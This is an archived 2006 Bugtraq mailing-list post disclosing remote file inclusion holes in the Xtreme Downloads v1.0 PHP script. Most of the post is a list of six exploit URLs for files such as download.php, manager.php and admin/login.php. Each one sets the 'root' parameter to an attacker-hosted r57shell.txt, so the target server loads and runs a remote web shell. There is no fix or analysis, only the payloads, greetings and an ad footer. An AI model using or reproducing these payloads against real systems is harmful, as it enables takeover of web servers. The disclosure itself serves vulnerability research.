Multiple file include exploits in Xtreme Downloads v.1.0
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxx, content@xxxxxxxxxxxxxxx, listadmin@xxxxxxxxxxxxxxxxx, MAILER-DAEMON@xxxxxxxx, MAILER-DAEMON@xxxxxxxxxxxxxxxxxx, postmaster@xxxxxxxxx, root@xxxxxxxxxxxxxxx, str0ke@xxxxxxxxxxx, submit@xxxxxxxxxxx, webmaster@xxxxxxxxxxxxxxxxx
- Subject: Multiple file include exploits in Xtreme Downloads v.1.0
- From: "black code" <black-cod3@xxxxxxxxxxx>
- Date: Tue, 06 Jun 2006 00:10:44 +0300
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Multiple file include exploits in Xtreme Downloads v.1.0
script type : Xtreme Downloads v.1.0
bug found by : sweet-devil & black-code
team : site-down
type : file include
####################################################
exploits :
download.php
http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt?
manager.php
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt?
/admin/scripts/category.php?
http://www.example.com/path/admin/scripts/category.php?root=http://yoursite/r57shell.txt?
/includes/add_allow.php?
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt?
/admin/index.php
http://www.example.com/path/admin/index.php?root=http://yoursite/r57shell.txt?
/admin/login.php
http://www.example.com/path/admin/admin/login.php?root=http://yoursite/r57shell.txt?
####################################################
#######################
emails:
gamr-14@xxxxxxxxxxx & black-cod3@xxxxxxxxxxx
#######################
All my respect to our friends , lezr.com , g123g.net
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/